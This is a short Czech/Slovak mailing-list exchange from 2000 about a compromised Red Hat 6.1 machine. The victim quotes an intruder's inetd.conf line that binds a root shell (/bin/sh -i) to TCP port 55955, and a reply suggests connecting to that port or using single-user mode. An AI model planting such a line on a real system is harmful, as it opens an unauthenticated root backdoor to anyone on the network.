Bezpecnostni dira v RH 6.1 ?

Tomas Hornicek dumber na dumber.sk
Neděle Duben 30 23:47:31 CEST 2000

On Tue, Apr 25, 2000 at 10:33:02AM +0200, Petr Kincl wrote:
> Dobry den.
 pridal si do inetd.conf radek 55955 tcp stream nowait root /bin/sh -i a tim se stal panem celeho PC. Jsem si jisty, ze heslo roota urcite neznal. Provedl neco, co nemohu odhalit. PC se chova tak, ze se mohu prihlasit pomoci ssh, ale jiz ne pres telnet ani na lokalni konzolu. Pokud pres ssh zmenim heslo uzivatele, i tak nejde provest telnet. Ostatni sluzby z inetd.conf bezi normalne, jen telnet a login jsou nejak zakazany a ja nevim cim. Nestalo se to nekomu?

A zkousel jste uz pripojit se na ten port 55955? ;)
anebo co takhle skusit single mod?

> Diky.
> S pozdravem
> Petr Kincl

					Dumber
--
Ludia su ako supy zlietajuce sa nad mrtvolami, kazdy si snazi uchytit co najviac z toho co po nej zostalo

  __
  |  \     _ _ |   _  _        		Tomas "Dumber" Hornicek
  |   \| || | ||_ /_\|         		bhornicek na globtel.sk
  |__ /|_|| | ||_|\_ |         		dumber na dumber.sk
  http://www.dumber.sk
  tel/fax: 00 421 905 199 240